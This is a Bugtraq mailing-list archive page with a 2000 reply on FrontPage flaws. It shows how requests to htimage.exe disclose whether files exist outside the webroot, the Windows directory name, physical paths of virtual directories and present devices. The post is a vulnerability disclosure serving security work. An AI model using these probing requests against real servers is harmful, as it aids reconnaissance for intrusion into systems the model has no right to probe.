Bugtraq mailing list archives
Re: More vulnerabilities in FP
From: sozni () USA NET (.sozni)
Date: Thu, 20 Apr 2000 10:50:50 MDT
As well, the file existence test listed under Problem#3 works for files outside of the webroot but on the same volume. For example, if your webroot is at d:\Inetpub\wwwroot, the request, http://server/cgi-bin/htimage.exe/test.doc?0,0 will test for the existence of a file d:\test.doc. Note however, that htimage.exe checks for the file d:\Inetpub\wwwroot\test.doc first and and then d:\test.doc. It does not allow me to test for file existence on other volumes.
Taking this one steup further, you could also use this to verify names or existence of other significant directories. For example, to verify the name of their NT directory: http://server/cgi-bin/htimage.exe/winnt/win.ini?0,0 If indeed the NT directory is named winnt, you will get the appropriate error, otherwise you will get the Config File not found error. You can also get the full physical path of virtual directories by doing something like this (in w2k/FP4): http://server/cgi-bin/htimage.exe/_vti_bin?0,0 Which on my system returned: Picture config file not found, tried the following: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi Note, however, that if any error occurs in reading the file (such as access denied) that it treats it as if the file is not found. Therefore, requests for things like pagefile.sys will return an error that the Picture config file is not found. Oh and one more thing, it can also be used to verify system devices such as LPT and Com ports. Yeah, big deal but it is something to ponder: http://server/cgi-bin/htimage.exe/lpt1?0,0 http://server/cgi-bin/htimage.exe/com1?0,0 If the device exists, the web client will seem to stall. If it doesn't exist, you get the standard error. .sozni ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Re: More vulnerabilities in FP .sozni (Apr 20)
- <Possible follow-ups>
- Re: More vulnerabilities in FP Thomas Dullien (Apr 21)
- Re: More vulnerabilities in FP Roman (Apr 22)
- Re: More vulnerabilities in FP Daniel Dočekal (Apr 24)
- Re: More vulnerabilities in FP Ian McDonald (Apr 26)
- ISS Security Advisory: Insecure file handling in IBM frcactrl program Aleph One (Apr 26)